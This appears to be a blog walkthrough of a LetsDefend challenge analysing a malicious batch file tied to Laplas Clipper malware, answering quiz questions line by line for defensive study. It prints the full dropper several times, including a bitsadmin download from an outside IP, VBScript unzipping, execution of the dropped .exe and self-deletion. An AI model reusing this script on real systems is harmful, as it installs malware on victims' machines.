A malicious batch file has been discovered that downloads and executes files associated with the Laplas Clipper malware. Analyze this batch file to understand its behavior and help us investigate its activities.

Introduction

Happy holidays everyone! The new year is quickly approaching and I have no plans on slowing down. Today we’ll be going through another LetsDefend challenge - Batch Dowloader.

Batch files were my introduction into programming and computing. I wrote some small batch files to copy files and easily install MineCraft mods, something along those lines. The number of resources online that were available even back then in the early 2000s made me want to get into software development. Looking back, Python might have been better to learn, but I’ll still have those memories of writing my first Batch file.

Let’s answer some questions!

Question one

What command is used to prevent the command echoing in the console?

First things first we need to check on the batch file that this whole scenario is about.

LetsDefend gives us access to a web-based virtual machine. The batch file is located in a zip file at C:\Users\LetsDefend\Desktop\ChallengeFile. You can go through and extract the batch file, or just refer to it here:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

@echo off
bitsadmin /transfer System /Download /Priority FOREGROUND http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip
setlocal
cd /d %~dp0
Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"
cd /d "%TEMP%"
start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
del %~s0 /q

:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
cscript //nologo %vbs%
if exist %vbs% del /f /q %vbs%

One of the first things I learned when writing batch files was how to stop commands from showing in the console. The wikipedia article I referenced earlier has a Hello World! example:

@ECHO OFF
ECHO Hello World!
PAUSE

There’s even a nicely written explanation of what each line does:

The @ symbol at the start of any line prevents the prompt from displaying that command as it is executed. The command ECHO OFF turns off the prompt permanently, or until it is turned on again.

There’s our first answer.

Question two

Which tool is used to download a file from a specified URL in the script?

We’ve seen what the first line of the script does (@echo off). We can move on to the second line and break it down:

bitsadmin /transfer System /Download /Priority FOREGROUND http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip

bitsadmin is a command I’m unfamiliar with. Looking at this second line in it’s entirety reminds me of iex, or Invoke Expression. I see a lot of PowerShell scripts with iex in ClickFix reporting and in my own findings. If we read the MS Learn docs for bitsadmin we can see that it’s a tool to manage file upload/downloads.

To no surprise the /transfer option transfers one or more files. The parameters gives us some clarity on the rest of the line.

  • name - This is the first parameter after /transfer. We can see now that the name of this job is System.
  • type - /Download is the parameter given in the script. Ther other valid option is /Upload.
  • priority - This is an optional argument that is included in the malicious script. The priority is given as FOREGROUND, which appears to be above HIGH.
  • remotefilename - This is the next parameter and points us to the remote file http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip. If we were writing IOCs for this incident then we can safely include this IP address and the name and filehash of the .zip file.
  • localfilename - The final parameter is the name/location of the output file. In this case it will output to %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip.

We understand what the second line does now. The answer to the second question is answered almost immediately with bitsadmin. It’s important to understand how a malicious script runs and what it’s doing. Reporting the IOCs in scripts and understanding how attacks work is a fun part of the job!

Just note that most maicious scripts would be obfuscated so you shouldn’t expect easy-to-read batch scripts in the wild.

Question three

What is the priority set for the download operation in the script?

After breaking that second line down and understanding all the parameters we know that the priority is set to FOREGROUND.

Question four

Which command is used to start localization of environment changes in the script?

We’re up to the fourth question of this challenge, time to move on to third line of the script:

setlocal

We can look at the doccumentation for setlocal which gives a pretty big clue to the answer:

Starts localization of environment variables in a batch file. Localization continues until a matching endlocal command is encountered or the end of the batch file is reached.

Question five

Which IP address is used by malicious code?

We can go back to the second line of the malicious script for this answer. Specifically the remotefilename parameter: ... http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip ...

The IP address hosting the remote .zip folder is the answer.

Question six

What is the name of the subroutine called to extract the contents of the zip file?

We need to look into the syntax for batch files to confirm how subroutines are decleared. From previous experience I know that subroutines can be thought of as being similar to methods or classes in Python. The goto command is used to go directly to a line that is decleared with a starting colon. Something like :DeleteFiles for a method that deletes files in some wiper malware, for example.

This is the doccumentation for the goto command. There’s an example in the linked document that shows how goto and ‘subroutines’ can be used:

echo off
format a: /s
if not errorlevel 1 goto end
echo An error occurred during formatting.
:end
echo End of batch program.

For reference this is a batch program formats a disk in drive A as a system disk. If the operation is successful, the goto command directs processing to the :end label. For the purpose of this question and this scenario we’re considering subroutines and labels as being the same thing.

Looking at the script we can see that the label :UnZipFile is decleared before all of the logic. This label/subroutine is our answer.

Question seven

Which command attempts to start an executable file extracted from the zip file?

Let’s take a closer look at line 7:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

@echo off
bitsadmin /transfer System /Download /Priority FOREGROUND http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip
setlocal
cd /d %~dp0
Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"
cd /d "%TEMP%"
start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
del %~s0 /q

:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
cscript //nologo %vbs%
if exist %vbs% del /f /q %vbs%

This attempts to start the FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe executable. The entire line is the answer.

Question eight

Which scripting language is used to extract the contents of the zip file?

The UnzipFile subroutine that we looked at in question six holds the answer for this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
cscript //nologo %vbs%
if exist %vbs% del /f /q %vbs%

If you’ve written macros for Word or other Office applications this should look pretty familiar to you! The %vbs% tags around almost every line should be a good give-away as well. If you’re still not sure, then you can just do a quick search for VBS and you should find the wikipedia article for VBScript. It’s a language I haven’t seen much in the past few years, but it can be useful for Windows based malware as it’ll just run.

Conclusion

A nice little room before the end of the year comes. I’ve finally updated this site to show filters for the platforms, and I’ve been messing around with the way that codeblocks are actually displayed now which is nice. In the future you’ll see a lot more highlighting and language specific syntax. Yay!